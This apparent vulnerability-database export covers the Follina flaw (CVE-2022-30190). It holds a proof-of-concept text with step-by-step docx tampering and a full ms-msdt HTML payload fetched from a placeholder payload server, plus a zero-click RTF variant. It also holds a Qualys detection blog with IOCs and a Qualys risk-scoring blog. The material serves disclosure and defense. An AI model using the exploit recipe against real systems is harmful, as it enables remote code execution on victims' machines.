PowerShell](https://www.bleepingcomputer.com/news/security/new-microsoft-office-zero-day-used-in-attacks-to-execute-powershell/) \n \n## Summary \n \nOn the 29th of May 2022, the Nao_Sec team, an independent Cyber Security Research \nTeam, discovered a malicious Office document shared on Virustotal. This document is \nusing an unusual, but known scheme to infect its victims. The scheme was not detected as \nmalicious by some EDR, like Microsoft Defender for Endpoint. This vulnerability could lead to \ncode execution without the need for user interaction, as it does not involve macros, except if the \nProtected View mode is enabled. There is no CVE number attributed yet. \n \n \n## Technical Details \n \nThe vulnerability is being exploited by using the MSProtocol URI scheme to load some code. \nAttackers could embed malicious links inside Microsoft Office documents, templates or emails \nbeginning with ms-msdt: that will be loaded and executed afterward without user interaction \n- except if the Protected View mode is enabled. Nevertheless, converting the document to \nthe RTF format could also bypass the Protected View feature. \n \n## Proof of Concept \n \nMS Office docx files may contain external OLE Object references as HTML files. There is an HTML scheme \"ms-msdt:\" which invokes the msdt diagnostic tool, which is capable of executing arbitrary code (specified in parameters). \n \nThe result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros). \n \nHere are the steps to build a Proof-of-Concept docx: \n \n1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx. \n \n2. Edit `word/_rels/document.xml.rels` in the docx structure (it is a plain zip).
Modify the XML tag `<Relationship>` with attribute \n \n``` \nType=\"http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject\" \n``` \n \nand `Target=\"embeddings/oleObject1.bin\"` by changing the `Target` value and adding attribute `TargetMode`: \n \n``` \nTarget = \"http://<payload_server>/payload.html!\" \nTargetMode = \"External\" \n``` \n \nNote the Id value (probably it is \"rId5\"). \n \n3. Edit `word/document.xml`. Search for the \"<o:OLEObject ..>\" tag (with `r:id=\"rId5\"`) and change the attribute from `Type=\"Embed\"` to `Type=\"Link\"` and add the attribute `UpdateMode=\"OnCall\"`. \n \nNOTE: The created malicious docx is almost the same as for [CVE-2021-44444](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444). \n \n4. Serve the PoC (calc.exe launcher) html payload with the ms-msdt scheme at `http://<payload_server>/payload.html`: \n \n``` \n<!doctype html> \n<html lang=\"en\"> \n<body> \n<script> \n//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA should be repeated >60 times \nwindow.location.href = \"ms-msdt:/id PCWDiagnostic /skip force /param \\\"IT_RebrowseForFile=cal?c IT_SelectProgram=NotListed IT_BrowseForFile=h$(IEX('calc.exe'))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe \\\"\"; \n</script> \n \n</body> \n</html> \n``` \n \nNote that the comment line with AAA should be repeated >60 times (for filling up enough space to trigger the payload for some reason). \n \n## BONUS (0-click RTF version) \n \nIf you also add these elements under the `<o:OLEObject>` element in `word/document.xml` at step 3: \n \n``` \n<o:LinkType>EnhancedMetaFile</o:LinkType> \n<o:LockedField>false</o:LockedField> \n<o:FieldCodes>\\f 0</o:FieldCodes> \n``` \n \nthen it'll work as RTF also (open the resulting docx and save it as RTF). 
\n \nWith RTF, there is no need to open the file in Word, it is enough to browse to the file and have a look at it in a preview pane. The preview pane triggers the external HTML payload and RCE is there without any clicks. \n \n## Sources : \n \n- https://nao-sec.org/about \n- https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/detection \n- https://gist.github.com/tothi/66290a42896a97920055e50128c9f040 \n- https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/ \n \n \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/167317/msdt-poc.txt"}], "qualysblog": [{"lastseen": "2022-06-16T21:57:00", "description": "_A new remote code execution vulnerability called \u201cFollina\u201d has been found lurking in most Microsoft products. In this blog, we examine a potential attack vector as well as technical details of Follina, and chart the ability to detect this new vulnerability using both Qualys Multi-Vector EDR and Qualys Context XDR.___\n\nOn May 27, 2022, a security researcher [tweeted](<https://twitter.com/nao_sec/status/1530196847679401984>) about a malicious Microsoft Word document with alarmingly low detection rates that he had found on VirusTotal. Only four vendors detected the document back then. Eventually, as other researchers saw the harmful potential of this low-interaction vulnerability, Microsoft acknowledged the threat and assigned [CVE-2022-30190](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) for tracking purposes.\n\nBased on the attribution provided by Microsoft, it was discovered that another user \u2013 \u201ccrazyman\u201d with the Shadow Chaser Group \u2013 had initially reported this vulnerability back in April. 
This new remote code execution vulnerability has been dubbed _Follina _in reference to the area code of an Italian town. More importantly, although it has been confirmed by Microsoft, as of this writing it has yet to be patched. [Recent reports](<https://twitter.com/threatinsight/status/1532830739208732673>) already mention the targeting of local U.S. and European government personnel and a major [telecommunication provider](<https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/>) in Australia.\n\nThe Follina vulnerability\u2019s footprint is significant as it affects ALL Microsoft Office versions - 2013 and above \u2013 on ALL currently supported Microsoft Windows operating systems \u2013 even the latest: Windows Server 2022! Microsoft Office is the most popular productivity suite on Earth, installed on 1B+ devices worldwide.\n\nWhat makes this new MS Word vulnerability unique is the fact that there are no macros exploited in this attack. Most malicious Word documents leverage the macro feature of the software to deliver their malicious payload. As a result, normal macro-based scanning methods will not work to detect Follina. Like all vulnerabilities that involve social engineering, the bar for exploitation is low. All an attacker needs to do is lure a targeted user to download a Microsoft document or view an HTML file embedded with the malicious code.\n\n## Phases of an Attack Exploiting the Follina Vulnerability****\n\nThis pictogram represents the attack chain of a typical exploit leveraging Follina (fig.1):\n\nFig.1: Follina attack chain\n\nHere are the steps we observed:\n\nStep 1: The attacker sends an email containing a malicious Microsoft Office document (.docx, etc.) to the targeted user. \nStep 2: The user executes this file, which resolves and executes the attacker-controlled external resource from the document.xml.ref file. \nStep 3: Code exploiting the Follina vulnerability is now served to the user. 
\nStep 4: This code then launches additional commands like downloading Remote Access Trojans, etc.\n\n## Technical Details of Follina: CVE-2022-30190\n\nQualys found the macro-less MS Word document leveraged a novel technique by referencing an external resource, which in turn called a malicious page. This page then called the ms-msdt: URL protocol handler, to execute PowerShell script code. ms-msdt: resources are handled by the Microsoft Support Diagnostic Tool ([MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>)). This legitimate Microsoft tool is a part of Microsoft\u2019s troubleshooting pack. It should be on cybersecurity\u2019s detection radar, since it features prominently in the [LOLBAS project](<https://lolbas-project.github.io/lolbas/Binaries/Msdt/>) \u2013 albeit with different payloads. LOLBAS exists to document every binary, script, and library that can be used for Living Off The Land techniques. Our research found that modern operating systems such as Windows 2016 that do not have msdt.exe by default are nevertheless also vulnerable to Follina.\n\nA Follina attack involves loading an external reference pointing to a malicious URL. That said, even with macros disabled on a system, the \u201cProtected View\u201d feature can be used to execute code under the security context of the user running the MS Office document. Additionally, there are the location.href and window.location.href HTML methods. In a malicious Microsoft Office document, the OLE Object external reference in the document.xml.refs file contains a URL that ends with a \u201c!\u201d. Figure 2 below shows how the code appears:\n\nFig.2: document.xml.refs pointing to external reference\n\nWhen the user clicks on the document, a call is made to the host hxxp://141.98.215.99/color.html external URL resource, which then serves a malicious document containing a malicious ms-msdt: command-invoking PowerShell script code. 
Figure 3 shows the malicious code hosted:\n\nFig.3: Sample payload showcasing launch of PowerShell via ms-msdt\n\nAs shown in the image above, most samples observed in the wild involve base64 encoded script code. This base64 encoded PowerShell script code (fig.4, in blue) is decoded (in white) to:\n\nFig.4: PowerShell script code, decoded\n\nAnother variant that we observed involved the use of this malicious code (fig.5):\n\nFig.5: Decoded PowerShell script code variant 2\n\n## Qualys Multi-Vector EDR Can Detect Follina****\n\nIn April 2022, Qualys delivered [Multi-Vector EDR 2.0](<https://blog.qualys.com/product-tech/2022/04/04/edr-is-dead-long-live-multi-vector-edr>) which features comprehensive threat detection and enhanced prioritization for security teams to quickly respond to the most critical incidents. [Qualys Multi-Vector EDR](<https://www.qualys.com/apps/endpoint-detection-response/>) then prevents future attacks from emerging threats like Follina by identifying and eliminating vulnerabilities exploited by malware.\n\nRules detecting the kind of Follina attack chain described above are already available in and mapped to [T1203](<https://attack.mitre.org/techniques/T1203/>), according to the MITRE ATT&CK framework. Our updated EDR offering operationalizes MITRE ATT&CK tactics, not just techniques.\n\n### Detection of MSDT.exe with suspicious arguments\n\nFig.6\n\nOne of the first markers of exploitation is msdt.exe executing base64 encoded PowerShell, as shown above (fig.6).\n\n### Associated process tree\n\nFig.7\n\nEvidence of exploitation of this vulnerability is the parent-child relationship between winword.exe executing msdt.exe (fig.7).\n\n## Qualys Context XDR Can Detect Follina****\n\nWe [launched Qualys Context XDR](<https://blog.qualys.com/product-tech/2022/02/08/introducing-qualys-context-xdr-the-difference-between-chaos-clarity>) back in February 2022. 
Since its introduction, we have continued to add new features to [our cloud service](<https://www.qualys.com/apps/extended-detection-response/>), and one that will soon be available is support for [SYSMON](<https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon>). Context XDR will leverage the process creation, network connection, and file creation logging features from the Windows Event log.\n\nHere is how we combine the fields provided by the following three event IDs into a sample rule logic:\n\n 1. Event ID 1: Process creation \nLogs the relationship between msdt.exe and a Microsoft Office executable along with its command line parameters. \n**AND**\n 2. Event ID 3: Network connection \nLogs network activities via msdt.exe \n**OR**\n 3. Event ID 22: DNSEvent (DNS query) \nLogs name resolutions to reach malicious resources\n\nThis easily translates into a Qualys Context XDR rule as follows (fig.8):\n\nFig.8: Partial Qualys Context XDR rule logic\n\nPost-processing of events leads to a screen like the one below (fig.9):\n\nFig.9: Correlation of an exploitation event in Qualys Context XDR\n\nAn alerting event is created by correlating the values of different Sysmon fields. Figure 10 shows these enriched values in additional detail:\n\nFig.10: Excerpt of values correlating Sysmon fields to create alert\n\n## How to Detect Follina Exploitation Attempts (CVE-2022-30190)\n\nInformation that Microsoft saves as a part of diagnostic logs definitely helps determine if a system was compromised by leveraging the Follina vulnerability (CVE-2022-30190). The [MSDT](<https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msdt>) webpage lists the following default locations for looking up diagnostic information post-execution that are controlled via a \u201c/dt\u201d command line parameter:\n\n 1. %LOCALAPPDATA%\\Diagnostics \n 2.
%LOCALAPPDATA%\\ElevatedDiagnostics\n\nIn the Qualys Research Team\u2019s test system, the diagnostic data was stored under:\n\n%LOCALAPPDATA%\\Diagnostics\\<9-digit-number>\\<date YYYYMMDD.000>\n\nThese directories contain several files that can help Digital Forensics and Incident Response personnel to determine what file was run. For example, figure 11 is an excerpt from a PCW.debugreport.xml file in one of our test systems that shows the path and the binary that was run:\n\nFig.11: AppName value in PCW.debugreport.xml depicting the command run via Follina\n\nAdditionally, in case the above XML file is tampered with, the ResultReport.xml file also gives us more details as shown below (fig.12):\n\nFig.12: Additional forensics information present in ResultReport.xml\n\n## Conclusion\n\nAbove all, the Qualys Research Team recommends that enterprises take all appropriate steps mentioned by Microsoft to remediate this vulnerability until patches are made available. Security teams may also add custom AppLocker publisher rules to block msdt.exe from executing or apply an Attack Surface Remediation rule to block all Office applications from creating child processes. 
Additionally, avoid clicking on unsolicited email communications and enable Qualys Multi-Vector EDR and Qualys Context XDR on affected systems.\n\n## Update\n\nAs a part of the current [Patch Tuesday](<https://blog.qualys.com/vulnerabilities-threat-research/2022/06/14/june-2022-patch-tuesday>) release, Microsoft has released [updates remediating](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>) this vulnerability.\n\n## IOCs\n \n \n SHA256\n 3aa16a340aacc5aecbdb902a5f6668f117b62e27966ab41f8a71a1dd1a08f8bd\n 241f00110265b32f0cab95c5503446d0f41d7f78230797acde1280c9865de220\n fe43f3ea0146e107521b6b81c53ee4eb583cce8bad69f39072134f53081738dd\n e3ba1c45f9dd1f432138654b5f19cf89c55e07219b88aa7628334d38bb036433\n 59bb14faf1f5c29fd1c8a4c3b6085a51acda9659b3148ca4eed50c0efc36a6ba\n 4bd8e0e2d27d6d50c6633e20d78d2e7e092cb29e5e47df9a93a29a995f29d57\n b6ebc38ddaeee12c90df4124d5f73eab93f54cf3a906da0a0c824d2d3ec45c33\n e36984c8db0a05b9524fec5293a580f9c403b7ed683e09e4743a30f9d053e0cd\n a841a941f1048189f679f8e457a8f21954e891864144c585a4abc0e6c685c764\n 73ada27d09e0481ed33c9e2dcafe6d2c09607353867674753be3bad33c8a404\n c5a72c4bdb32669c207d5a0dc274f70152c4c989bb23970ca0310d7cd712509\n 215fab217fe7890fc796ffcf9e82b0407c056991b79b2b07fb41b104e19ef1c5\n 3b0858ed47784638f397078930dd7a9b287bdb0f6706d32a7ad7dbbd11d2573c\n db94048b4a606e2e48bdacc07ca1d686e3f26639e822612172cab08e66abfe93\n 3db60df73a92b8b15d7885bdcc1cbcf9c740ce29c654375a5c1ce8c2b31488a1\n 6b06af3d20fd4f35fe62151d45e4344314d26b68d886d80ad6d8a375820247cf\n a3fbfe25541744380cb53a2faca2d7c61f8e9973520e82acb379127a99db867d\n 0751db137f6830f9ce5c88f6757cef35bd15eb12d46b809611f1a141113ee01d\n db6592107ee379494ae9f0130e4834a9faf3a598aa27aa6fd6f342a9806b34df\n 4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784\n 64563b42eb7a4569bfbd8e9f04b00d350875a1bb6fe67ddaf1f932d3b0a7dc98 \n\n## MITRE ATT&CK Mapping\n\n**TID**| **Tactic**| **Technique** \n---|---|--- \nT1566.001| Initial Access| Phishing: 
Spearphishing Attachment \nT1059.001| Execution| Command and Scripting Interpreter: PowerShell \nT1203| Execution| Exploitation for Client Execution \n \n## Contributors\n\n * Arun Pratap Singh, Engineer, Threat Research, Qualys\n * Pawan N, Engineer, Threat Research, Qualys", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-14T20:52:25", "type": "qualysblog", "title": "Detect the Follina MSDT Vulnerability (CVE-2022-30190) with Qualys Multi-Vector EDR & Context XDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-14T20:52:25", "id": "QUALYSBLOG:A63B251EBA1A69DBCD57674990704F6C", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-11T22:50:52", "description": "Vulnerability Management is a foundational component of any cybersecurity program for the implementation of appropriate security controls and the management of cyber risk. 
Earlier this year Qualys introduced the latest iteration of its vulnerability management product [VMDR 2.0 with TruRisk](<https://blog.qualys.com/product-tech/2022/06/06/introducing-qualys-vmdr-2-0>) which focusses on helping organizations understand and manage cyber risk. Qualys TruRisk assesses risk by taking into account multiple factors such as evidence of vulnerability exploitation, asset criticality, its location, and evidence of compensating controls on the asset among many other factors to assess the accurate risk posture for an organization.\n\nIn this blog we do a deep-dive into the vulnerability prioritization algorithm for TruRisk, compare it to existing vulnerability scoring systems, such as Common Vulnerability Scoring System (CVSS) and Exploit Prediction Scoring System (EPSS), to demonstrate why TruRisk is a better method for prioritizing risk than existing methods. This blog is the first of many blogs focused on different aspects of TruRisk, with other aspects covered in later blogs.\n\n### **Key Takeaways**\n\n * Since 2016, every subsequent year has reported more vulnerabilities than the year before (on average 8%-10% more)\n * CVSS based prioritization results in 51% of vulnerabilities marked as high or critical which leads to ineffective, low-value prioritization\n * Less than 3% of vulnerabilities have weaponized exploits or evidence of exploitation in the wild, two attributes posing the highest risk.\n * Exploit Prediction Scoring System (EPSS) is a step in the right direction to predict vulnerability exploitation. 
However, it still ranks some vulnerabilities that are actively exploited with a lower probability of exploitation\n * Qualys TruRisk helps organizations prioritize risk by focusing on exploitability, evidence of exploitability, and likelihood of exploitability, resulting in up to 85% fewer vulnerabilities to prioritize compared to CVSS.\n\nQualys TruRisk brings asset context, threat context and vulnerability intelligence data under one platform, empowering IT and security teams to make better, informed prioritization decisions.\n\nBut first let\u2019s talk about a few key challenges.\n\n### Vulnerabilities Are on the Rise\n\nEvery year since 2016 (see Fig. 1), the number of vulnerabilities reported by NIST has been greater than the year before. According to the [National Vulnerability Database](<https://nvd.nist.gov/vuln/search/statistics?form_type=Basic&results_type=statistics&search_type=all&isCpeNameSearch=false>) (NVD), the number of vulnerabilities reported in 2022 (18,841) has already surpassed the vulnerabilities reported in 2020. And we still have three months to go.\n\nFigure 1: Number of Vulnerabilities by Year (Source: NVD)\n\n### **Vulnerability Threat Landscape**\n\nAs the number of vulnerabilities increases, so does the risk to enterprises. But not all vulnerabilities are created equal. Some vulnerabilities pose greater risk to organizations than others. For example, less than 3% of vulnerabilities have weaponized exploit code. It is crucial to prioritize vulnerabilities like these, which are among the most critical, first. \n\nFigure 2: Vulnerability Threat Landscape\n\nTraditionally, organizations have relied on CVSS scores for prioritization.
However, as we will see in the next section, there are limitations in using CVSS as the only vulnerability prioritization method.\n\n### Challenges With CVSS Based Prioritization \n\nThe **Common Vulnerability Scoring System (CVSS)** was introduced in the early 2000s to address the need for a common method to rate the severity of vulnerabilities. Previously, two researchers could rate the very same vulnerability in different ways based on their subjective understanding of it. This created confusion for security practitioners because they could not accurately determine the actual severity of vulnerabilities. The CVSS system was developed to address this issue by enabling the uniform _technical_ severity assessment of vulnerabilities.\n\nA key factor to keep in mind is that CVSS only calculates the technical severity of the vulnerability, not the risk it poses to an organization. Over time, CVSS has been used as a proxy for determining the risk a vulnerability posed to the organization, leading to unintended consequences. This includes patching cycles spent fixing countless vulnerabilities with a CVSS score of 7.5 or higher, while some medium severity vulnerabilities were deprioritized even if they posed a greater risk.\n\nCVSS scores are grouped into four severity categories: low, medium, high, and critical. \n\nCVSS Score| CVSS Severity \n---|--- \n0.1 \u2013 3.9| Low \n4.0 \u2013 6.9| Medium \n7.0 \u2013 8.9| High \n9.0 \u2013 10.0| Critical \n \nFigure 3: CVSS Score distribution grouped by CVSS severity\n\nAs shown in Fig.3, **51% (96,340) of the total vulnerabilities are categorized as Critical or High according to CVSS scores**. However, empirical research shows that not all the vulnerabilities in these CVSS score buckets need equal/high attention.
The main issue is that CVSS base scores don\u2019t consider threat information such as active exploitation in the wild, the likelihood of exploitation in the wild, activity associated with the vulnerability on the dark web or social media, whether CISA has categorized it as a known exploited vulnerability, associated threat actors, etc.\n\nAs shown in Fig. 4, known exploited vulnerabilities (as categorized by the [CISA Known Exploited Vulnerabilities (KEV) Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)) are, as expected, concentrated at higher CVSS scores (the red dots indicate CISA KEV vulnerabilities).\n\nHowever, a significant number of exploits have been discovered even for lower CVSS scores. For example, **92 out of 832 (11%) CISA KEV vulnerabilities have a CVSS score of less than 7.** This could be an issue when relying only on CVSS scores.\n\nFigure 4: CISA known vulnerabilities distributed across CVSS score.\n\n### **Exploit Prediction Scoring System**\n\nTo address the lack of threat context in the CVSS scoring system, first.org in recent years introduced the [Exploit Prediction Scoring System (EPSS)](<https://www.first.org/epss/>), an open, data-driven effort for estimating the likelihood (probability) that a software vulnerability will be exploited in the wild. This is a step in the right direction. EPSS\u2019s goal is to help network defenders better prioritize vulnerability remediation efforts. The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.\n\nAs evidenced by Figure 5, EPSS helps highlight vulnerabilities with a high likelihood of exploitation and correlates well with CISA KEV vulnerabilities.\n\nFigure 5: EPSS Score and CISA Known Vulnerabilities distribution across CVSS score\n\nFigure 6: EPSS Score distribution\n\nThe availability of patches also plays a key role in EPSS scores. 
If patches are available, the probability of exploitation is ranked lower. Many of the CISA Known Vulnerabilities are scored lower in EPSS if they have patches/fixes available. However, when prioritizing what to patch first, we need to consider the whole set, not just the ones with patches. For example, consider the following recent vulnerabilities, which have low EPSS scores. If we rely only on EPSS to prioritize them, they will not show up in a priority list of vulnerabilities to be remediated. Several examples of vulnerabilities with low EPSS scores and high TruRisk scores are shown in Figure 5.\n\nCVE| Title| EPSS| TruRisk (QVS) \n---|---|---|--- \nCVE-2021-36942| PetitPotam| 0.26| 95 \nCVE-2021-31207| Proxyshell| 0.02| 95 \nCVE-2021-34523| Proxyshell| 0.16| 100 \nCVE-2022-30190| Follina| 0.69| 100 \nCVE-2016-3351| Microsoft Edge Cumulative Security Update (MS16-105)| 0.24| 95 \n\n**Critical CVEs with patches available scoring low on EPSS**\n\n### **Qualys Severity Levels**\n\nGiven the challenges with CVSS scores, the Qualys research team introduced [Qualys severity levels](<https://qualysguard.qg2.apps.qualys.com/qwebhelp/fo_portal/knowledgebase/severity_levels.htm>) to assess the severity of Qualys IDs (QIDs). In addition to determining the risk associated with exploitation, Qualys severity levels also focus on the potential consequences of vulnerability exploitation from an attacker\u2019s point of view. Each QID severity level is reviewed by the Qualys Research Team, taking into consideration vulnerability chaining, server-side vs. client-side vulnerabilities, and information from various threat-intel sources to assess them accurately.\n\nQualys severity levels are an improvement over CVSS, as they help customers quickly prioritize critical vulnerabilities, as can be seen in Fig. 7. 
\n\nFigure 7: Qualys Severity Level Distribution (Source: Qualys)\n\n### Qualys TruRisk, a Data-Driven Way To Prioritize Risks\n\nAll of the scoring mechanisms presented so far are attempting to answer one key question:\n\n_What should defenders focus on first?_\n\nEach model attempts to answer the question in its own way but falls short of its goal. Organizations need a better way to respond quickly and prioritize vulnerabilities based on risk.\n\nTo address these challenges, Qualys introduced [Qualys VMDR 2.0 with TruRisk](<https://blog.qualys.com/product-tech/2022/06/06/introducing-qualys-vmdr-2-0>) earlier this year to help organizations prioritize vulnerabilities, assets, and groups of assets based on risk. \n\nQualys VMDR with TruRisk is powered by one of the most comprehensive exploit and threat intelligence databases. It spans over 185k CVEs and 25+ unique threat and exploit intelligence sources such as Metasploit, Canvas, CISA KEV, and even GitHub, which is increasingly becoming the go-to place to publish exploits.\n\nWith TruRisk, organizations can pinpoint which CVEs are exploited in the wild (even those that don't have a QID) and which malware, ransomware, or threat actor groups are exploiting them. These insights can then be used to prioritize vulnerabilities based on risk.\n\nLet\u2019s take a closer look at how the TruRisk algorithm works, and how it compares to CVSS and EPSS.\n\nTo determine risk, Qualys TruRisk vulnerability scores rely on multiple factors to build the most accurate risk profile for a vulnerability.\n\n**Qualys Vulnerability Score (QVS)** is a Qualys-assigned score for a vulnerability based on multiple factors associated with the CVE, such as CVSS and external threat indicators like active exploitation, the likelihood of the vulnerability being exploited in the wild, sightings on the dark web and social web, exploit code maturity, CISA known exploited status, and many more. \n \n**Qualys Detection Score (QDS)** is assigned to QIDs by Qualys. 
QDS has a range from 1 to 100. If multiple CVEs contribute to a QID, the CVE with the highest score is considered for the QDS calculation. \n \n**Asset Risk Score (ARS)** is the overall risk score assigned to an asset based on contributing factors such as the Asset Criticality Score (ACS), the QDS scores of each QID, an auto-assigned weighting factor (w) for each QID criticality level, and the number of vulnerabilities on the asset.\n\nHere is the list of inputs that go into the algorithm.\n\n### **CVSS Base Score**\n\nThe CVSS base score serves as one of the key inputs to assess the risk of the vulnerability. CVEs with higher CVSS base scores are rated higher than those with lower scores. But a high CVSS score alone doesn\u2019t result in a high TruRisk score. Evidence of exploitation or weaponized exploit code maturity is required for the CVE to fall in the critical range.\n\n### **CISA Known Exploited Vulnerability (KEV)**\n\nVulnerabilities that are catalogued by CISA as known exploited vulnerabilities, i.e., those that are actively being exploited in the wild, are included in the algorithm.\n\n### **Real-Time Threat Indicators (RTIs)**\n\nThe TruRisk algorithm considers the type of vulnerability. For example, is it a Denial-of-Service (DoS) vulnerability or a remotely exploitable vulnerability? In the case of a remote vulnerability or a web application vulnerability, the risk is rated higher. Other RTIs, such as zero-day, active attacks, high data loss, high lateral movement, etc., that are collected from various threat feeds are also considered by the algorithm.\n\n### **Exploit Code Maturity**\n\nThe TruRisk algorithm analyzes the exploit code maturity for the given vulnerability. The exploit code maturity could be a Proof-of-Concept (PoC), which suggests a theoretical exploit exists. The exploit may already work against systems, or it could be weaponized, in which case the exploit code is considered very mature and can be easily used to compromise a system. 
The QDS algorithm rates weaponized exploits higher than PoC exploits. \n\n### **Malware**\n\nThe TruRisk algorithm checks to see if the vulnerability is being actively exploited by malware. If it is, then the risk is rated higher.\n\n### **Threat Actors / Ransomware Groups**\n\nThe TruRisk algorithm validates whether any threat actors or ransomware groups are actively exploiting the vulnerability. If that is the case, the risk is rated even higher than if it is only being exploited by malware. \n\n### **Trending Risk**\n\nThe TruRisk algorithm checks if the vulnerability has been actively exploited in the last 14 days by monitoring the Dark Web, social media, GitHub accounts, and many other similar sources. The risk is further increased if the vulnerability is determined to be trending and exploited in the wild. \n\n### **Applied Mitigation Controls**\n\nThe algorithm correlates the risk from the vulnerability with intelligence related to the asset to assess whether the vulnerability represents a threat to it. For example, the vulnerability may exist on the asset, but the system may have mitigation controls already applied which greatly reduce the risk of exploitation of the vulnerability in the customer\u2019s specific environment. \n\n### **EPSS Score (from First.org)**\n\nQualys TruRisk also leverages [EPSS](<https://www.first.org/epss/model>) scores, which predict the probability of a vulnerability being exploited in the next 30 days. Vulnerabilities with a higher EPSS score are ranked higher.\n\nFigure 8: Contributing factors to Qualys TruRisk Scores\n\n### How Does Qualys TruRisk Compare Against CVSS and EPSS?\n\nAs customers adopt Qualys TruRisk to address their prioritization needs, they want to know how CVSS, EPSS, and TruRisk compare.\n\nQualys TruRisk is hyper-focused on three attributes: exploit availability, evidence of exploitation in the wild, and likelihood of exploitation. 
This helps organizations focus on the highest-risk vulnerabilities.\n\nQualys TruRisk rates less than 1% of vulnerabilities as critical, and less than 7% of vulnerabilities as high. This drastically reduces the number of vulnerabilities (up to 85% fewer compared to CVSS, which ranks 51% of vulnerabilities high or critical) that organizations need to focus on to reduce risk. See Fig. 9.\n\nClearly, organizations need to remediate other vulnerabilities as well. However, when deciding where to begin, we recommend starting with vulnerabilities that have a TruRisk QDS risk score of 70 or higher. \n\n### **Qualys Vulnerability Score (QVS) vs CVSS**\n\nFigure 9: Distribution of TruRisk (QVS) Scores vs CVSS\n\n### **Qualys TruRisk vs EPSS**\n\nThe following figure (Fig. 10) shows the distribution of EPSS scores against Qualys Vulnerability Scores (QVS) and CISA known vulnerabilities. QVS scores consistently place vulnerabilities with evidence of exploitation, such as CISA known vulnerabilities, in a higher score range even if the EPSS score is low, as annotated in the figure below.\n\nFigure 10: EPSS Score vs TruRisk (QVS) Score\n\n### **Qualys TruRisk (QVS) vs CISA KEV**\n\nEvidence of vulnerability exploitation from sources such as the CISA KEV and other threat intelligence sources tracked by the Qualys research team plays a key role in determining the risk of a vulnerability.\n\nAs seen below (Fig. 11), vulnerabilities that appear in the CISA Known Exploited Vulnerabilities catalog are consistently scored higher (QVS scores of 90 or higher) by the Qualys TruRisk algorithm.\n\nFigure 11: CISA Known Vulnerabilities distributed across QVS score.\n\nLet's take the example of CVE-2021-36942 (the Windows LSA Spoofing Vulnerability). It is rated at 5.3 by the National Vulnerability Database (NVD), but it\u2019s actively exploited today by malware groups and threat actors. 
The exploit code maturity is weaponized, making it easy for attackers to exploit the vulnerability to compromise and infect systems. Qualys TruRisk ranks the CVE-2021-36942 vulnerability as critical given its exploit availability and evidence of exploitation in the wild.\n\n### **How to Interpret Qualys TruRisk Scores**\n\nQualys TruRisk builds the risk profile of vulnerabilities, assets, and asset groups by using the following three risk scores:\n\n**Qualys Vulnerability Score (QVS)** \u2013 QVS is assessed at each CVE level based on the external threat and exploit intelligence factors listed above. It is also computed for vulnerabilities that don\u2019t have Qualys vulnerability detection signatures (QIDs). These QVS scores can be individually queried for insights from our [dedicated API endpoint](<https://blog.qualys.com/product-tech/2022/08/08/a-deep-dive-into-vmdr-2-0-with-qualys-trurisk>).\n\n**Qualys Detection Score (QDS)** \u2013 QDS is assessed at each QID level. This is the score customers need to focus on for their vulnerability prioritization needs. **QDS builds on the QVS score by adding two key aspects**. First, some QIDs map to multiple CVEs; QDS selects the highest QVS of all CVEs associated with that QID. Next, QDS accounts for any compensating/mitigation controls that are applied to an asset to reduce the risk score for a given vulnerability. For example, QDS will reduce the risk of a Remote Desktop Protocol (RDP) vulnerability if RDP is disabled.\n\nQDS/QVS Range| Description \n---|--- \n>=95| CVSS critical, exploited in the wild, has weaponized exploit available, trending risk on social media, dark web. \n90-95| CVSS critical, weaponized exploit available, and evidence of exploitation by malware, threat actors/ransomware groups \n80-89| CVSS Critical, weaponized exploit available, but no evidence of exploitation; or CVSS Critical with evidence of exploitation, but mitigation in place. 
